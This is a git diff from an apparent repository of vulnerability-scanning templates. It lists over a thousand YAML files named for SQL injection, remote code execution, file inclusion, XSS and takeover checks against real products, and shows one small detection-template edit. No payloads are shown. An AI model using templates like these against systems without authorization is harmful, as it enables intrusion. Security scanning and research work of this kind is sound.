poc/java/weblogic-detect-11144.yaml | 15 +- poc/javascript/Arcms-json_newslist-sqli.yaml | 0 poc/javascript/BlueCMS_v1-adjs-sqli.yaml | 0 .../aem-querybuilder-json-servlet-187.yaml | 5 - poc/javascript/bower-json.yaml | 2 +- poc/javascript/fastjson-1-2-42-rce-7408.yaml | 9 +- poc/javascript/fastjson-1-2-47-rce.yaml | 9 +- poc/javascript/fastjson-1-2-62-rce.yaml | 17 +- poc/javascript/fastjson-1-2-67-rce-7424.yaml | 19 +- 
.../fastjson1_2_47-rce-Deserialization.yaml | 0 poc/javascript/js-version-jszip_3-1-3.yaml | 2 +- poc/javascript/keycloak-json-8472.yaml | 14 +- poc/javascript/package-json-9421.yaml | 9 +- poc/jenkins/jenkins-detect.yaml | 5 - poc/joomla/joomla-config-file.yaml | 6 +- poc/joomla/joomla-htaccess.yaml | 8 +- poc/kafka/kafka-consumer-monitor-8424.yaml | 2 +- poc/laravel/laravel-debug-enabled-8574.yaml | 14 +- poc/laravel/laravel-env-8583.yaml | 4 +- poc/laravel/laravel-log-file-8597.yaml | 5 +- .../Karel-ip-phone-lfi.yaml | 10 +- poc/local_file_inclusion/bems-api-lfi.yaml | 44 +- .../blue-ocean-excellence-lfi-758.yaml | 3 +- .../bullwark-momentum-lfi-808.yaml | 9 +- .../bullwark-momentum-lfi.yaml | 33 +- .../candidate-application-lfi-850.yaml | 4 - .../churchope-lfi-915.yaml | 15 +- .../dicoogle-pacs-lfi-6995.yaml | 3 + .../elfinder-version-7205.yaml | 22 +- .../generic-linux-lfi.yaml | 79 +- .../generic-windows-lfi.yaml | 10 +- .../geovision-geowebserver-lfi-7595.yaml | 8 +- .../health-check-lfi-7921.yaml | 18 +- .../hide-security-enhancer-lfi-7952.yaml | 6 +- .../huawei-hg659-lfi.yaml | 18 +- .../ibm-infoprint-lfi.yaml | 2 - poc/local_file_inclusion/jeewms-lfi.yaml | 10 +- .../jinfornet-jreport-lfi-8309.yaml | 5 - .../magicflow-lfi-8713.yaml | 5 + poc/local_file_inclusion/metinfo-lfi.yaml | 15 +- .../moodle-filter-jmol-lfi-8937.yaml | 2 +- .../oracle-fatwire-lfi.yaml | 11 +- .../pacsone-server-lfi-9430.yaml | 16 +- .../phpwiki-lfi-9567.yaml | 15 +- .../processmaker-lfi.yaml | 12 +- .../ruijie-networks-lfi-9940.yaml | 17 +- .../simple-image-manipulator-lfi-10283.yaml | 14 +- .../sl-studio-lfi-10320.yaml | 9 +- .../sofneta-mecdream-pacs-lfi-10350.yaml | 13 +- .../squirrelmail-lfi.yaml | 12 +- poc/local_file_inclusion/thinkcmf-lfi.yaml | 35 +- .../wp-javospot-lfi-11480.yaml | 4 + .../wp-socialfit-xss-11582.yaml | 4 +- .../wp-tutor-lfi-11599.yaml | 12 +- poc/local_file_inclusion/wp-vault-lfi(1).yaml | 49 +- .../xerox-efi-lfi-11681.yaml | 10 +- 
.../yishaadmin-lfi-11744.yaml | 14 +- poc/magento/magento-admin-panel-8693.yaml | 5 +- poc/magento/magento-cacheleak-8696.yaml | 3 +- poc/magento/magento-config.yaml | 6 +- poc/microsoft/74cms-sqli-8.yaml | 9 +- poc/microsoft/Arcms-json_newslist-sqli.yaml | 0 poc/microsoft/BlueCMS_v1-adjs-sqli.yaml | 0 poc/microsoft/IDOR-vuln-params.yaml | 32 +- poc/microsoft/JEEWMS-fileRead.yaml | 2 - poc/microsoft/aims-password-mgmt-client.yaml | 10 + poc/microsoft/aims-password-portal-222.yaml | 2 +- poc/microsoft/bems-api-lfi.yaml | 44 +- poc/microsoft/chamilo-lms-xss.yaml | 4 +- poc/microsoft/cisco-systems-login.yaml | 15 +- poc/microsoft/dedecms-openredirect.yaml | 10 +- poc/microsoft/feifeicms-lfr-7464.yaml | 2 +- poc/microsoft/grav-cms-detect-7842.yaml | 12 +- poc/microsoft/jeewms-lfi.yaml | 10 +- .../kevinlab-hems-backdoor-8467.yaml | 26 +- poc/microsoft/metatag-cms.yaml | 3 +- .../microsoft-echange-server-detect.yaml | 6 - poc/microsoft/microsoft-teams-webhook.yaml | 2 +- poc/microsoft/msmtp-config-8967.yaml | 5 - poc/microsoft/myucms-lfr-8984.yaml | 1 - poc/microsoft/octobercms-default-login.yaml | 17 +- poc/microsoft/octobercms-detect-9196.yaml | 12 +- poc/microsoft/odoo-cms-redirect.yaml | 8 +- poc/microsoft/pandora-fms-console.yaml | 3 +- poc/microsoft/rhymix-cms-detect.yaml | 8 +- poc/microsoft/samsung-wlan-ap-rce-10007.yaml | 11 +- poc/microsoft/seeddms-detect-10129.yaml | 40 +- poc/microsoft/strapi-cms-detect.yaml | 5 - poc/microsoft/vpms-auth-bypass-11069.yaml | 11 +- poc/microsoft/wems-manager-xss.yaml | 5 +- poc/microsoft/wp-arforms-listing.yaml | 3 +- poc/microsoft/wp-mstore-plugin-listing.yaml | 6 +- poc/microsoft/wp-plugin-lifterlms-11533.yaml | 47 +- poc/microsoft/wuzhicms-sqli-11658.yaml | 1 + poc/microsoft/zcms-v3-sqli.yaml | 12 +- poc/mongodb/alibaba-mongoshake-unauth.yaml | 2 +- poc/mongodb/mongodb-ops-manager-8922.yaml | 6 +- poc/mongodb/mongodb-unauth-8926.yaml | 6 +- .../rockmongo-default-credentials.yaml | 5 - poc/mongodb/rockmongo-default-login.yaml 
| 3 +- poc/mongodb/rockmongo-xss.yaml | 12 +- poc/netlify/netlify-takeover-9042.yaml | 11 +- poc/nginx/nginx-config.yaml | 10 +- poc/nginx/nginx-module-vts-xss-9108.yaml | 51 +- poc/nginx/nginx-proxy-manager-9111.yaml | 6 +- ...ized-puppet-node-manager-detect-10959.yaml | 44 +- poc/open_redirect/dedecms-openredirect.yaml | 10 +- .../netsweeper-open-redirect.yaml | 10 +- .../newsletter-open-redirect.yaml | 18 +- poc/open_redirect/odoo-cms-redirect.yaml | 8 +- poc/open_redirect/open-redirect-9308.yaml | 129 +- .../otobo-open-redirect-9411.yaml | 6 +- .../pieregister-open-redirect.yaml | 13 +- poc/open_redirect/pollbot-redirect-9623.yaml | 8 +- poc/open_redirect/sap-redirect-10066.yaml | 6 - .../thinkific-redirect-10732.yaml | 5 +- .../wp-grimag-open-redirect-11458.yaml | 22 +- .../wp-gtranslate-open-redirect.yaml | 3 +- .../wp-prostore-open-redirect.yaml | 10 +- .../wptouch-open-redirect-11594.yaml | 10 +- poc/oracle/Oracle-OAM-XSS.yaml | 4 - .../default-oracle-application-page-6891.yaml | 4 +- poc/oracle/oracle-dbcs-9355.yaml | 43 +- poc/oracle/oracle-ebs-xss-9375.yaml | 8 +- poc/oracle/oracle-fatwire-lfi.yaml | 11 +- .../oracle-iplanet-web-server-9393.yaml | 9 +- poc/oracle/oracle-people-enterprise-9398.yaml | 3 +- poc/oracle/oracle-siebel-xss.yaml | 20 +- poc/other/X-Remote-Addr .yaml | 2 +- poc/other/adiscon-loganalyzer-70.yaml | 52 +- poc/other/adminer-panel-75.yaml | 26 +- poc/other/ampps-admin-panel-305.yaml | 5 + poc/other/ansible-semaphore-panel-328.yaml | 30 +- poc/other/antsword-backdoor.yaml | 14 +- poc/other/apc-info.yaml | 3 + poc/other/artifactory_deploy.yaml | 29 +- poc/other/aspose-ie-file-download.yaml | 10 +- poc/other/aspose-words-file-download-572.yaml | 4 +- poc/other/axis-happyaxis-669.yaml | 9 +- poc/other/barracuda-panel-684.yaml | 4 +- poc/other/basic-cors.yaml | 40 +- poc/other/cache-poisoning.yaml | 28 +- poc/other/campaignmonitor-843.yaml | 19 +- poc/other/certificate-validation-882.yaml | 1 - poc/other/cgi-printenv-886.yaml | 5 +- 
poc/other/cgi-test-page.yaml | 2 - poc/other/circarlife-setup-918.yaml | 15 +- poc/other/clientaccesspolicy.yaml | 48 +- poc/other/cloudinary-1026.yaml | 5 +- poc/other/codeigniter-env.yaml | 5 +- poc/other/csod-panel-1288.yaml | 40 +- poc/other/custom-solr-file-read.yaml | 81 +- poc/other/d-link-wireless.yaml | 2 +- poc/other/deprecated-tls-6957.yaml | 27 +- poc/other/dir-listing-7009.yaml | 4 +- poc/other/domcfg-page-7075.yaml | 5 +- poc/other/easy-media-gallery-pro-listing.yaml | 48 +- poc/other/fatpipe-ipvpn-panel-7436.yaml | 3 +- poc/other/filezilla.yaml | 6 +- poc/other/firebase-urls.yaml | 2 +- poc/other/hjtcloud-arbitrary-file-read.yaml | 4 - poc/other/home-assistant-7981.yaml | 1 + poc/other/hp-service-manager-8032.yaml | 7 +- poc/other/huawei-hg532e-panel.yaml | 9 +- poc/other/internet-service.yaml | 6 +- poc/other/ioncube-loader-wizard.yaml | 13 +- poc/other/itop-panel.yaml | 6 +- poc/other/jenk.yaml | 2 +- poc/other/jkstatus-manager.yaml | 3 +- poc/other/jmx-console-8351.yaml | 4 +- poc/other/jolokia.yaml | 8 +- poc/other/landray-oa-fileread-8569.yaml | 0 poc/other/lazy-file-8607.yaml | 11 +- poc/other/liveview-axis-camera.yaml | 22 +- poc/other/local-file-inclusion.yaml | 109 +- poc/other/manageengine-adaudit-8729.yaml | 9 +- .../manageengine-adselfservice-8737.yaml | 7 +- poc/other/manageengine-analytics.yaml | 10 +- .../manageengine-assetexplorer-8757.yaml | 3 +- poc/other/manageengine-desktop-8762.yaml | 9 +- poc/other/mautic-crm-panel.yaml | 10 +- poc/other/metabase-panel.yaml | 7 +- poc/other/mikrotik-routeros.yaml | 6 +- poc/other/mobotix-guest-camera-8911.yaml | 5 +- poc/other/netscaler-gateway-9052.yaml | 13 +- poc/other/nextcloud-install-9085.yaml | 12 +- poc/other/ns-asg-file-read-9151.yaml | 32 +- poc/other/ntlm-directories-9155.yaml | 123 +- poc/other/nuuo-file-inclusion-9168.yaml | 5 +- poc/other/old-copyright.yaml | 4 + poc/other/open-mjpg-streamer.yaml | 9 +- poc/other/open-proxy-localhost.yaml | 21 +- poc/other/open-proxy-portscan.yaml 
| 6 +- poc/other/openam-workflow.yaml | 2 +- poc/other/otobo-panel-9412.yaml | 14 +- poc/other/panabit-panel-9445.yaml | 4 + poc/other/plesk-obsidian-9597.yaml | 7 +- poc/other/plesk-onyx.yaml | 2 +- poc/other/postmessage-tracker-9640.yaml | 50 +- poc/other/powerlogic-ion.yaml | 3 +- poc/other/printers-info-leak.yaml | 4 - poc/other/prometheus-flags-endpoint.yaml | 13 +- poc/other/proxy-checker.yaml | 31 + poc/other/psmessage.yaml | 16 +- poc/other/pulse-secure-panel-9715.yaml | 12 +- poc/other/pypicloud-panel.yaml | 11 +- poc/other/rack-mini-profiler-9788.yaml | 9 +- poc/other/rack-mini-profiler.yaml | 4 +- poc/other/request-based-interaction.yaml | 3 +- poc/other/robots-9887.yaml | 4 +- poc/other/scs-landfill-control-10098.yaml | 8 +- poc/other/securenvoy-panel-10114.yaml | 4 - poc/other/security-txt.yaml | 4 +- poc/other/shell-history.yaml | 2 +- poc/other/signatures-10269.yaml | 23936 +++++++++++++++- poc/other/sitecore-version-10292.yaml | 29 +- poc/other/sitecore-workflow-10293.yaml | 6 +- poc/other/skycaiji-admin-panel-10306.yaml | 2 +- poc/other/skycaiji-install.yaml | 5 +- poc/other/solr-query-dashboard.yaml | 14 +- poc/other/sonarqube-public-projects.yaml | 3 +- .../sonicwall-management-panel-10387.yaml | 4 +- .../spoofable-spf-records-ptr-10426.yaml | 14 +- poc/other/sugarcrm-panel-10569.yaml | 7 +- poc/other/supervpn-panel-10575.yaml | 1 + poc/other/supervpn-panel.yaml | 2 + .../symantec-messaging-gateway-10609.yaml | 8 +- poc/other/tectuus-scada-monitor.yaml | 10 +- poc/other/teradici-pcoip-10704.yaml | 7 - .../thinkcmf-arbitrary-code-execution.yaml | 4 - poc/other/tor-socks-proxy.yaml | 3 +- poc/other/tuxedo-connected-controller.yaml | 7 +- poc/other/upnp-device.yaml | 7 +- poc/other/ups-status-10984.yaml | 4 + poc/other/voipmonitor-workflow.yaml | 2 +- poc/other/wago-plc-panel.yaml | 2 +- poc/other/wazuh-panel.yaml | 7 +- poc/other/weatherlink-11115.yaml | 6 +- poc/other/workspace-one-uem-11393.yaml | 3 +- poc/other/wso2-management-console.yaml | 2 
+- poc/other/xds-amr-status.yaml | 57 +- poc/other/xff-403-bypass-11685.yaml | 21 +- poc/other/xxljob-panel.yaml | 5 + poc/other/yopass-panel.yaml | 4 +- poc/other/zabbix-dashboards-access.yaml | 8 +- poc/other/zte-panel-11841.yaml | 22 +- poc/other/zuul-panel-11843.yaml | 34 +- .../nuuo-nvrmini2-upgradehandlephp-rce.yaml | 4 +- poc/php/php-fpm-status.yaml | 3 + poc/php/php-proxy-detect-9544.yaml | 11 +- poc/php/php-timeclock-xss-9553.yaml | 7 +- poc/php/phpinfo-9517.yaml | 29 +- poc/php/phpmyadmin-setup.yaml | 25 +- poc/php/phpunit.yaml | 4 - poc/php/phpwiki-lfi-9567.yaml | 15 +- poc/php/ruijie-phpinfo-9951.yaml | 20 +- poc/php/thinkphp-5023-rce-10748.yaml | 58 +- poc/php/twig-php-ssti.yaml | 3 +- poc/php/weiphp-sql-injection.yaml | 16 +- poc/php/wp-phpfreechat-xss.yaml | 5 - poc/python/autobahn-python-detect-593.yaml | 8 +- poc/python/default-django-page-6841.yaml | 4 +- poc/python/django-secret.key.yaml | 45 +- poc/python/python-metrics.yaml | 2 +- poc/rabbitmq/rabbitmq-dashboard.yaml | 2 - poc/redis/exposed-redis-7337.yaml | 4 +- .../Digital-Signage-rce.yaml | 13 +- poc/remote_code_execution/SymfonyRCE.yaml | 4 - poc/remote_code_execution/VOIPrce.yaml | 4 - .../clockwatch-enterprise-rce-1011.yaml | 5 +- .../code42-log4j-rce.yaml | 3 +- .../fastjson-1-2-42-rce-7408.yaml | 9 +- .../fastjson-1-2-47-rce.yaml | 9 +- .../fastjson-1-2-62-rce.yaml | 17 +- .../fastjson-1-2-67-rce-7424.yaml | 19 +- .../fastjson1_2_47-rce-Deserialization.yaml | 0 .../hashicorp-consul-rce-7890.yaml | 18 +- .../hashicorp-consul-rce.yaml | 12 +- .../hiboss-rce-7945.yaml | 10 +- .../icewarp-webclient-rce-8129.yaml | 7 +- .../metersphere-plugin-rce.yaml | 2 +- .../mobileiron-log4j-jndi-rce-8904.yaml | 9 +- poc/remote_code_execution/natshell-rce.yaml | 8 +- .../pdf-signer-ssti-to-rce-9472.yaml | 3 - .../phalcon-framework-source.yaml | 5 +- ...-netkang-next-generation-firewall-rce.yaml | 30 +- .../rce-cve-2021-41773.yaml | 55 +- poc/remote_code_execution/rconfig-rce.yaml | 20 +- 
.../salesforce-aura-9981.yaml | 4 +- .../samsung-wlan-ap-rce-10007.yaml | 11 +- .../sangfor-edr-rce-10030.yaml | 7 +- .../sar2html-rce-10082.yaml | 3 - .../showdoc-file-upload-rce-10226.yaml | 10 +- .../springboot-log4j-rce.yaml | 7 +- poc/remote_code_execution/tamronos-rce.yaml | 7 +- .../thinkcmf-rce-10727.yaml | 27 +- .../thinkphp-5023-rce-10748.yaml | 58 +- .../vmware-horizon-log4j-jndi-rce.yaml | 21 +- .../vmware-vcenter-log4j-jndi-rce.yaml | 46 +- .../wangkang-NS-ASG-rce-1.yaml | 3 - poc/remote_code_execution/webui-rce.yaml | 17 +- ...s-emails-verification-for-woocommerce.yaml | 45 +- .../wordpress-rce-simplefilelist-11302.yaml | 15 +- .../wp-xmlrpc-brute-force-11623.yaml | 5 - poc/remote_code_execution/yapi-rce-11726.yaml | 25 +- .../grails-database-admin-console-7822.yaml | 6 - poc/ruby/rails6-xss-9800.yaml | 16 +- poc/samba/samba-config-9987.yaml | 4 + poc/samba/samba-detect-9988.yaml | 10 +- poc/sap/sap-hana-xsengine-panel-10037.yaml | 2 + poc/sap/sap-netweaver-detect-10044.yaml | 6 +- poc/sap/sap-redirect-10066.yaml | 6 - .../elasticsearch-sql-client-detect.yaml | 43 +- poc/search/searchbar.yaml | 4 +- poc/sensitive/sensitive-storage-exposure.yaml | 3 +- poc/shopify/Shopify-custom-token.yaml | 5 +- poc/shopify/shopify-takeover-10204.yaml | 14 +- poc/shopify/shopify-token.yaml | 6 +- poc/smtp/esmtprc-config-7258.yaml | 13 +- poc/smtp/msmtp-config-8967.yaml | 5 - poc/social/Linkedin-id.yaml | 25 +- poc/social/facebook-secret.yaml | 4 +- poc/social/twitter-secret(1).yaml | 6 +- poc/social/wp-socialfit-xss-11582.yaml | 4 +- poc/sql/74cms-sqli-8.yaml | 9 +- poc/sql/Arcms-json_newslist-sqli.yaml | 0 poc/sql/BlueCMS_v1-adjs-sqli.yaml | 0 poc/sql/GLPI-9.3.3-SQL-Injection.yaml | 55 +- poc/sql/Maticsoft-Shop-sqli.yaml | 3 - poc/sql/api-abuseipdb.yaml | 2 +- poc/sql/couchdb-exposure-1239.yaml | 5 +- poc/sql/database-error-6771.yaml | 3 +- poc/sql/db-schema.yaml | 13 +- poc/sql/dbeaver-credentials.yaml | 16 +- poc/sql/elasticsearch-sql-client-detect.yaml | 43 +- 
poc/sql/exposed-adb-7280.yaml | 15 +- poc/sql/exposed-sqlite-manager-7350.yaml | 3 - .../grails-database-admin-console-7822.yaml | 6 - poc/sql/mongodb-ops-manager-8922.yaml | 6 +- poc/sql/mongodb-unauth-8926.yaml | 6 +- poc/sql/odoo-database-manager.yaml | 8 +- poc/sql/oracle-dbcs-9355.yaml | 43 +- poc/sql/sql-dump-10497.yaml | 8 +- poc/sql/sqliheader.yaml | 4 +- poc/sql/thumbs-db-disclosure-10763.yaml | 6 +- poc/sql/weiphp-sql-injection.yaml | 16 +- poc/sql/wordpress-db-repair-11254.yaml | 6 +- poc/sql/wordpress-tmm-db-migrate-11317.yaml | 2 +- poc/sql/wuzhicms-sqli-11658.yaml | 1 + poc/sql/zcms-v3-sqli.yaml | 12 +- poc/sql_injection/74cms-sqli-8.yaml | 9 +- .../Arcms-json_newslist-sqli.yaml | 0 poc/sql_injection/BlueCMS_v1-adjs-sqli.yaml | 0 .../GLPI-9.3.3-SQL-Injection.yaml | 55 +- poc/sql_injection/Maticsoft-Shop-sqli.yaml | 3 - .../elasticsearch-sql-client-detect.yaml | 43 +- .../exposed-sqlite-manager-7350.yaml | 3 - poc/sql_injection/sql-dump-10497.yaml | 8 +- poc/sql_injection/sqliheader.yaml | 4 +- poc/sql_injection/weiphp-sql-injection.yaml | 16 +- poc/sql_injection/wuzhicms-sqli-11658.yaml | 1 + poc/sql_injection/zcms-v3-sqli.yaml | 12 +- poc/ssh/circleci-ssh-config.yaml | 2 +- poc/ssh/ssh-known-hosts.yaml | 4 - poc/ssrf/cloudflare-image-ssrf.yaml | 5 +- poc/ssrf/linkerd-ssrf-detect.yaml | 9 - poc/ssrf/microstrategy-ssrf-8861.yaml | 4 +- poc/ssrf/ssrf-via-oauth-misconfig.yaml | 3 +- poc/ssrf/vmware-vcenter-ssrf.yaml | 7 +- poc/ssrf/w3c-total-cache-ssrf-11077.yaml | 7 +- poc/ssrf/w3c-total-cache-ssrf.yaml | 4 +- poc/ssrf/xmlrpc-pingback-ssrf-11689.yaml | 18 +- poc/ssrf/zimbra-preauth-ssrf-11810.yaml | 20 +- .../acquia-takeover-35.yaml | 2 +- .../aftership-takeover.yaml | 3 +- .../agilecrm-takeover-211.yaml | 5 +- poc/subdomain_takeover/aha-takeover-214.yaml | 7 +- .../announcekit-takeover-321.yaml | 59 +- .../bitbucket-takeover-740.yaml | 6 +- .../brightcove-takeover.yaml | 5 +- .../cargo-takeover-866.yaml | 5 +- .../feedpress-takeover-7458.yaml | 5 +- 
poc/subdomain_takeover/flywheel-takeover.yaml | 2 + .../ghost-takeover-7622.yaml | 16 +- .../helpjuice-takeover.yaml | 5 +- .../helpscout-takeover-7934.yaml | 9 +- .../jazzhr-takeover-8235.yaml | 7 +- .../landingi-takeover-8566.yaml | 2 +- .../launchrock-takeover-8603.yaml | 5 +- .../netlify-takeover-9042.yaml | 11 +- .../pantheon-takeover-9461.yaml | 7 +- .../pingdom-takeover-9587.yaml | 8 +- .../proposify-takeover-9693.yaml | 5 +- .../readme-takeover-9842.yaml | 7 +- poc/subdomain_takeover/s3-subtakeover.yaml | 4 + .../shopify-takeover-10204.yaml | 14 +- .../tave-takeover-10661.yaml | 7 +- poc/subdomain_takeover/urge-takeover.yaml | 3 +- poc/subdomain_takeover/webflow-takeover.yaml | 7 +- .../pdf-signer-ssti-to-rce-9472.yaml | 3 - poc/template_injection/twig-php-ssti.yaml | 3 +- ...ecology_E-Office_Uploadify_FileUpload.yaml | 49 +- poc/upload/showdoc-file-upload-rce-10226.yaml | 10 +- poc/upload/zhiyuan-file-upload-11791.yaml | 15 +- poc/vmware/vmware-horizon-11038.yaml | 13 +- poc/vmware/vmware-horizon-log4j-jndi-rce.yaml | 21 +- poc/vmware/vmware-horizon-panel-11035.yaml | 3 +- poc/vmware/vmware-vcenter-log4j-jndi-rce.yaml | 46 +- poc/vmware/vmware-vcenter-ssrf.yaml | 7 +- poc/web/axigen-webadmin.yaml | 9 +- poc/web/azkaban-web-client-676.yaml | 10 +- poc/web/cobbler-webgui-1124.yaml | 2 +- poc/web/dixell-xweb500-filewrite-7020.yaml | 18 +- .../ewebs-arbitrary-file-reading-7273.yaml | 9 +- .../fingerprinthub-web-fingerprints-7480.yaml | 253 +- poc/web/geovision-geowebserver-lfi-7595.yaml | 8 +- poc/web/icewarp-webclient-rce-8129.yaml | 7 +- poc/web/iplanet-web-server-8190.yaml | 9 +- poc/web/keenetic-web-login-8442.yaml | 6 +- poc/web/microsoft-teams-webhook.yaml | 2 +- poc/web/microweber-xss-8865.yaml | 7 +- poc/web/oracle-iplanet-web-server-9393.yaml | 9 +- poc/web/saia-web-server-info-9980.yaml | 7 +- poc/web/total-web-10816.yaml | 3 - poc/web/web-config-11126.yaml | 154 +- poc/web/webflow-takeover.yaml | 7 +- poc/web/weblogic-detect-11144.yaml | 15 +- 
poc/web/webmodule-ee.yaml | 3 - poc/web/webui-rce.yaml | 17 +- poc/web/xp-webcam-11699.yaml | 8 +- poc/web/zimbra-web-client-11812.yaml | 9 +- poc/web/zoho-webhook-token-11835.yaml | 2 + poc/wordpress/alfacgiapi-wordpress-257.yaml | 62 +- .../nativechurch-wp-theme-lfd-9001.yaml | 10 +- poc/wordpress/trilithic-viewpoint-login.yaml | 20 +- .../viewpoint-system-status-11016.yaml | 8 +- .../wordpress-accessible-wpconfig-11236.yaml | 2 +- poc/wordpress/wordpress-db-repair-11254.yaml | 6 +- poc/wordpress/wordpress-debug-log-11258.yaml | 4 +- ...s-emails-verification-for-woocommerce.yaml | 45 +- poc/wordpress/wordpress-git-config-11278.yaml | 11 +- poc/wordpress/wordpress-plugins-detect.yaml | 28 +- .../wordpress-rce-simplefilelist-11302.yaml | 15 +- .../wordpress-registration-enabled.yaml | 12 +- poc/wordpress/wordpress-rest-dosviacp.yaml | 9 +- .../wordpress-tmm-db-migrate-11317.yaml | 2 +- ...ordpress-total-upkeep-backup-download.yaml | 11 +- poc/wordpress/wordpress-user-enum.yaml | 4 - poc/wordpress/wordpress-user-enumeration.yaml | 2 + poc/wordpress/wordpress-weak-credentials.yaml | 7 - ...dpress-wordfence-waf-bypass-xss-11354.yaml | 5 +- .../wordpress-wordfence-xss-11362.yaml | 18 +- .../wordpress-zebra-form-xss-11379.yaml | 13 +- ...p-123contactform-plugin-listing-11400.yaml | 52 +- poc/wordpress/wp-adaptive-xss.yaml | 5 + poc/wordpress/wp-arforms-listing.yaml | 3 +- poc/wordpress/wp-church-admin-xss-11424.yaml | 8 +- poc/wordpress/wp-code-snippets-xss.yaml | 8 +- poc/wordpress/wp-flagem-xss.yaml | 8 +- .../wp-grimag-open-redirect-11458.yaml | 22 +- .../wp-gtranslate-open-redirect.yaml | 3 +- poc/wordpress/wp-haberadam-idor-11468.yaml | 10 +- .../wp-idx-broker-platinum-listing.yaml | 3 +- poc/wordpress/wp-javospot-lfi-11480.yaml | 4 + poc/wordpress/wp-license-file-11489.yaml | 4 - poc/wordpress/wp-license-file.yaml | 5 +- .../wp-mailchimp-log-exposure-11492.yaml | 9 +- poc/wordpress/wp-mstore-plugin-listing.yaml | 6 +- poc/wordpress/wp-nextgen-xss.yaml | 8 +- 
poc/wordpress/wp-phpfreechat-xss.yaml | 5 - poc/wordpress/wp-plugin-lifterlms-11533.yaml | 47 +- poc/wordpress/wp-plugin-utlimate-member.yaml | 3 +- poc/wordpress/wp-prostore-open-redirect.yaml | 10 +- poc/wordpress/wp-slideshow-xss.yaml | 4 - poc/wordpress/wp-socialfit-xss-11582.yaml | 4 +- poc/wordpress/wp-tutor-lfi-11599.yaml | 12 +- poc/wordpress/wp-vault-lfi(1).yaml | 49 +- .../wp-xmlrpc-brute-force-11623.yaml | 5 - .../wp-xmlrpc-pingback-detection-11627.yaml | 2 +- poc/wordpress/wp-xmlrpc.yaml | 4 +- poc/wordpress/wpdm-cache-session-11439.yaml | 3 + .../wptouch-open-redirect-11594.yaml | 10 +- .../springboot-actuators-jolokia-xxe.yaml | 19 +- poc/xss/DOM-XSS-SiteMinder.yaml | 5 - poc/xss/Oracle-OAM-XSS.yaml | 4 - poc/xss/accessibility-helper-xss-19.yaml | 3 +- poc/xss/basic-xss-prober-696.yaml | 6 +- poc/xss/chamilo-lms-xss.yaml | 4 +- poc/xss/coldfusion-debug-xss.yaml | 5 +- poc/xss/concrete-xss-1174.yaml | 7 +- poc/xss/discourse-xss-7013.yaml | 6 +- poc/xss/dom-xss-7080.yaml | 3 + poc/xss/dom-xss.yaml | 79 +- poc/xss/java-melody-xss-8225.yaml | 7 +- poc/xss/microweber-xss-8865.yaml | 7 +- poc/xss/mida-eframework-xss.yaml | 6 +- poc/xss/moodle-filter-jmol-xss-8944.yaml | 14 +- poc/xss/nginx-module-vts-xss-9108.yaml | 51 +- poc/xss/oracle-ebs-xss-9375.yaml | 8 +- poc/xss/oracle-siebel-xss.yaml | 20 +- poc/xss/php-timeclock-xss-9553.yaml | 7 +- poc/xss/qcubed-xss.yaml | 7 +- poc/xss/rails6-xss-9800.yaml | 16 +- poc/xss/rockmongo-xss.yaml | 12 +- poc/xss/sick-beard-xss-10234.yaml | 18 +- poc/xss/sick-beard-xss.yaml | 13 +- poc/xss/tikiwiki-reflected-xss.yaml | 5 +- poc/xss/turbocrm-xss-10851.yaml | 22 +- poc/xss/wems-manager-xss.yaml | 5 +- ...dpress-wordfence-waf-bypass-xss-11354.yaml | 5 +- poc/xss/wordpress-wordfence-xss-11362.yaml | 18 +- poc/xss/wordpress-zebra-form-xss-11379.yaml | 13 +- poc/xss/wp-adaptive-xss.yaml | 5 + poc/xss/wp-church-admin-xss-11424.yaml | 8 +- poc/xss/wp-code-snippets-xss.yaml | 8 +- poc/xss/wp-flagem-xss.yaml | 8 +- 
poc/xss/wp-nextgen-xss.yaml | 8 +- poc/xss/wp-phpfreechat-xss.yaml | 5 - poc/xss/wp-slideshow-xss.yaml | 4 - poc/xss/wp-socialfit-xss-11582.yaml | 4 +- poc/xss/xss-fuzz-11701.yaml | 6 +- 1114 files changed, 32351 insertions(+), 9070 deletions(-) mode change 100644 => 100755 poc/auth/zoho-webhook-token-11835.yaml mode change 100755 => 100644 poc/cve/CVE-2020-5515.yaml mode change 100755 => 100644 poc/directory_listing/Apexis-IPCAM-directory-traversal.yaml mode change 100755 => 100644 poc/directory_listing/ecology-springframework-directoryTraversal.yaml mode change 100755 => 100644 poc/java/ecology-springframework-directoryTraversal.yaml mode change 100644 => 100755 poc/java/jboss-status-8241.yaml mode change 100755 => 100644 poc/javascript/Arcms-json_newslist-sqli.yaml mode change 100755 => 100644 poc/javascript/BlueCMS_v1-adjs-sqli.yaml mode change 100755 => 100644 poc/javascript/fastjson1_2_47-rce-Deserialization.yaml mode change 100644 => 100755 poc/local_file_inclusion/wp-vault-lfi(1).yaml mode change 100755 => 100644 poc/microsoft/Arcms-json_newslist-sqli.yaml mode change 100755 => 100644 poc/microsoft/BlueCMS_v1-adjs-sqli.yaml mode change 100755 => 100644 poc/other/landray-oa-fileread-8569.yaml create mode 100644 poc/other/proxy-checker.yaml mode change 100755 => 100644 poc/remote_code_execution/fastjson1_2_47-rce-Deserialization.yaml mode change 100755 => 100644 poc/sql/Arcms-json_newslist-sqli.yaml mode change 100755 => 100644 poc/sql/BlueCMS_v1-adjs-sqli.yaml mode change 100755 => 100644 poc/sql_injection/Arcms-json_newslist-sqli.yaml mode change 100755 => 100644 poc/sql_injection/BlueCMS_v1-adjs-sqli.yaml mode change 100755 => 100644 poc/web/fingerprinthub-web-fingerprints-7480.yaml mode change 100644 => 100755 poc/web/zoho-webhook-token-11835.yaml mode change 100644 => 100755 poc/wordpress/wp-vault-lfi(1).yaml diff --git a/date.txt b/date.txt index 3745c09494..bd531cb555 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20240929 +20240930 
diff --git a/poc.txt b/poc.txt index 1f0689d002..2e782d52bc 100644 --- a/poc.txt +++ b/poc.txt @@ -85415,6 +85415,7 @@ ./poc/other/provider-path.yaml ./poc/other/proxmox-panel.yaml ./poc/other/proxmox-ve.yaml +./poc/other/proxy-checker.yaml ./poc/other/prtg-workflow.yaml ./poc/other/prtg_network_monitor.yaml ./poc/other/prvpl.yaml diff --git a/poc/adobe/adobe-connect-central-login.yaml b/poc/adobe/adobe-connect-central-login.yaml index 1218c9f8d7..fdaf816057 100644 --- a/poc/adobe/adobe-connect-central-login.yaml +++ b/poc/adobe/adobe-connect-central-login.yaml @@ -1,10 +1,18 @@ id: adobe-connect-central-login info: - name: Adobe Connect Central Login + name: Adobe Connect Central Login Panel author: dhiyaneshDk + description: An Adobe Connect Central login panel was detected. severity: info - tags: adobe,panel + tags: adobe,panel,connect-central + reference: + - https://www.adobe.com/products/adobeconnect.html + classification: + 